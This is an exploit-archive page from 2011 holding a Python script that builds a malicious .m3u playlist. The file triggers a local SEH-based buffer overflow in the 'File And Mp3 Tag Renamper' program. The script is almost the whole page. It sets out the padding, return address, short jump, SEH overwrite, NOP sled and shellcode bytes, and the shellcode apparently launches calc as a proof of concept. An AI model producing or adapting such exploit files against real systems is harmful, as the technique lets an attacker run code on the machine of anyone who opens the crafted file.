File And Mp3 Tag Renamper Local Bufer Overflow(SEH)



EKU-ID: 970 CVE: OSVDB-ID:
Author: Angel Injection Published: 2011-09-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#!/usr/bin/python
#Exploit Title: File And Mp3 Tag Renamper Local Bufer Overflow(SEH)
#Author: Angel Injection
#Thanks: r0073r // Sid3^effects // r4dc0re // CrosS || Inj3ct0r Team || "SeeMe" // XroGuE // gunslinger_ // indoushka // KnocKout // ZoRLu // anT!-Tr0J4n // eXeSoul // KedAns-Dz // ^Xecuti0n3r // Kalashinkov3
#Home:http://1337day.com
#http://www.facebook.com/Angel.Injection
 
exploit   = "crash.m3u"
 
 
vuln    = "\x23\x0D\x0A\x23\x0D\x0A"
 
 
junk        =   "\x41" * 1200
ret      =   "\x25\x25\x34\x7D"
morejunk    =   "\x42" * 7500
NextSEH        =   "\xEB\x04\x90\x90"
SEH         =   "\x4F\x48\xD3\x75"
nops        =   "\x90" * 10
shellcode   =   "\x8b\xec\x55\x8b\xec\x68\x20\x20\x20\x2f\x68\x63\x61\x6c\x63\x8d\x45\xf8\x50\xb8\xc7\x93\xc2\x77\xff\xd0"
payload =   vuln+junk+ret+morejunk+NextSEH+SEH+nops+shellcode
 
file = open(exploit , 'w')
file.write(payload)
file.close()